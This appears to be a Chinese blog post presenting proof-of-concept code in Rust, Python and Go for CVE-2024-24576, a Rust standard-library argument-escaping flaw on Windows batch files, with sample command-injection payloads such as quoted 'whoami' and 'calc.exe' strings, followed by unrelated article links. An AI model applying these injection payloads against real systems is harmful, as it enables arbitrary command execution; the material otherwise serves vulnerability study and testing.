CVE-2024-24576 漏洞利用与测试工具集

张

张建站

2026/4/8 11:48:19

10分钟阅读

CVE-2024-24576 漏洞利用与测试工具集本项目提供了针对CVE-2024-24576安全漏洞的概念验证PoC代码涵盖Rust、Python和Go三种编程语言。该漏洞存在于 Rust 标准库在 Windows 平台上处理批处理文件参数时的转义逻辑缺陷可能导致任意命令执行。功能特性多语言 PoC 实现提供 Rust、Python、Go 三种语言的漏洞测试代码命令注入测试演示通过恶意构造的参数实现命令注入攻击批处理文件调用模拟展示调用test.bat批处理文件时的安全风险Rust 特有漏洞对比特别对比 Rust 中Command::arg与Command::args两种 API 的注入表现安全研究辅助帮助开发者理解漏洞原理并进行安全测试安装指南系统要求Windows 操作系统漏洞特定平台对应语言的运行时环境Rust 版本# 安装 Rust如未安装curl--protohttps--tlsv1.2-sSfhttps://sh.rustup.rs|sh# 编译运行rustc exploit.rs ./exploit.exePython 版本# 无需额外依赖使用标准库python exploit.pyGo 版本# 安装 Go如未安装# 下载地址https://golang.org/dl/# 编译运行go build exploit.go exploit.exe使用说明基础使用准备测试批处理文件在项目根目录创建test.bat文件echo off echo Argument received: %1运行 PoC 程序Rust 版本自动执行多个预定义 Payloadcargorun# 或./exploit.exe# 程序会自动测试多个 Payload并等待用户输入额外 PayloadPython 版本交互式输入python exploit.py Enter Payload:testwhoamiGo 版本交互式输入go run exploit.go Enter parameter1:testwhoami典型测试 Payload 示例# 基础测试test# 命令注入 - 执行 whoamitestwhoami# 命令注入 - 带引号绕过test whoami # 命令注入 - Rust 版本特殊构造 test calc.exeRust 版本特殊说明Rust 版本会依次测试预定义的 3 个 Payload用户输入的 Payload自动包装为test {input}格式分别测试Command::arg和Command::args两种 API核心代码Rust 漏洞利用核心代码usestd::process::Command;usestd::io;fnmain(){// 存储测试 Payload 的向量letmutpayloadsvec![test,r#test whoami#,r#test whoami#,];// 获取用户输入并添加到 Payload 向量println!(Enter payload:);letmutinputString::new();io::stdin().read_line(mutinput).expect(Failed to read line);letpayloadinput.trim();letcommandformat!(r#test {}#,payload);payloads.push(command);// 测试 Command::arg APIprintln!(Command Injection on Command::arg);forpayloadinpayloads{letoutputCommand::new(./test.bat).arg(payload).output().expect(Failed to execute command);println!(Output for payload {}:\n{},payload,String::from_utf8_lossy(output.stdout));}// 测试 Command::args APIprintln!(Command Injection on Command::args);forpayloadinpayloads{letoutputCommand::new(./test.bat).args([payload]).output().expect(Failed to execute command);println!(Output for payload {}:\n{},payload,String::from_utf8_lossy(output.stdout));}}Python 漏洞利用核心代码importsubprocessdefrun_batch_file(batch_file_path,second_argument): 执行批处理文件并传递参数存在命令注入风险参数未经过滤直接传递给 shell try:# shellTrue 会调用 cmd.exe导致参数被解析执行subprocess.run([batch_file_path,second_argument],shellTrue,checkTrue)exceptsubprocess.CalledProcessErrorase:print(fError occurred while running the batch file:{e})exceptFileNotFoundError:print(fBatch file {batch_file_path} not found.)# 示例使用从用户输入获取恶意参数batch_file_pathtest.batsecond_argumentinput(Enter Payload: )run_batch_file(batch_file_path,second_argument)Go 漏洞利用核心代码packagemainimport(bufiofmtosos/execstrings)funcmain(){batchFile:test.bat// 获取用户输入的参数reader:bufio.NewReader(os.Stdin)fmt.Print(Enter parameter 1: )param1,_:reader.ReadString(\n)param1strings.TrimSpace(param1)// 构造命令并执行parameters:[]string{param1}cmd:exec.Command(batchFile,parameters...)// 设置标准输出和错误输出cmd.Stdoutos.Stdout cmd.Stderros.Stderr// 执行命令存在注入风险err:cmd.Run()iferr!nil{fmt.Println(Error:,err)return}fmt.Println(Batch file executed successfully.)}漏洞说明根据 Rust 安全公告 CVE-2024-24576Rust 标准库在 Windows 平台上调用批处理文件时参数转义逻辑不完整可能导致恶意参数绕过转义机制并执行任意 shell 命令。影响版本Rust 1.77.2 及之前版本修复版本Rust 1.77.2部分修复、1.78.0完全修复风险 APICommand::arg和Command::args6HFtX5dABrKlqXeO5PUv/0utpqH8CghdzjK93UH3cmiU5I9LmI0lAqOHt1e1fxf更多精彩内容请关注我的个人公众号公众号办公AI智能小助手对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号网络安全技术点滴分享

IDEA断点调试5大实战技巧——从条件断点到异常捕获的深度解析

1. 条件断点：循环调试的终极武器第一次遇到需要调试包含300次循环的代码时，我差点把显示器砸了——每次手动检查变量值简直是在折磨自己。直到发现IDEA的条件断点功能，才明白原来调试循环可以这么优雅。条件断点的本质是给普通断点加上if…...

2026/4/8 11:48:17 阅读更多 →

写程序保温杯套图案切割，保暖又好看，输出:学生党通勤党高频使用。

一、实际应用场景描述在校园和通勤场景中，保温杯是“生存刚需”：- 早八学生- 加班打工人- 地铁 / 图书馆 / 教室但市面上的杯套普遍存在：- ❌ 纯色潜水料，毫无个性- ❌ 全封闭结构，散热慢、易闷热- ❌ 无法展示杯身品牌…...

2026/4/8 11:47:03 阅读更多 →

go-systemd 部署与监控：在生产环境中使用 go-systemd 的 10 个关键注意事项

go-systemd 部署与监控：在生产环境中使用 go-systemd 的 10 个关键注意事项【免费下载链接】go-systemd Go bindings to systemd socket activation, journal, D-Bus, and unit files 项目地址: https://gitcode.com/gh_mirrors/go/go-systemd go-systemd 是…...

2026/4/8 11:44:49 阅读更多 →

Flutter Riverpod：状态管理的新纪元

Flutter Riverpod：状态管理的新纪元告别 Provider 的繁琐，拥抱 Riverpod 的简洁与强大。一、为什么选择 Riverpod？ 作为一名追求代码如散文般优雅的 UI 匠人，我对状态管理工具有着近乎偏执的要求。Riverpod 不仅解决了 Provider 的…...

2026/4/7 20:28:44 阅读更多 →

【Scala深度学习】PyTorch On Scala3 系列课程第一章 01 ：入门与环境搭建【Ai Infra 3.0】[PyTorch Scala3 硕士研一课程]

章节 1: PyTorch ON Scala3入门与环境搭建本章将为PyTorch的使用做好准备。我们首先会配置必要的软件和环境。接着，主要内容将转向PyTorch的核心数据结构：张量。您将学习如何： 使用常用包管理器安装PyTorch。配置适合PyTorch项目的开发环…...

2026/4/7 21:19:26 阅读更多 →

STM32开发必备的C语言核心技巧与实战解析

1. STM32开发中的C语言核心知识点解析作为一名嵌入式开发者，我经常遇到初学者询问如何快速掌握STM32开发所需的C语言知识。今天我就结合自己多年的实战经验，整理出一份STM32开发中最关键的C语言知识点指南。这些内容不仅适合初学者系统学习，也…...

2026/4/7 17:54:53 阅读更多 →

Linux命令-nano（字符终端文本编辑器）

nano 是 Linux 系统中一个简单易用的命令行文本编辑器，以其直观的界面和易用性而闻名，特别适合初学者和快速编辑任务。它是 GNU 项目的一部分，替代了早期的 pico 编辑器。 📖 基本语法 nano [选项] [文件名]重要特性： …...

2026/4/7 14:19:47 阅读更多 →

更多精彩文章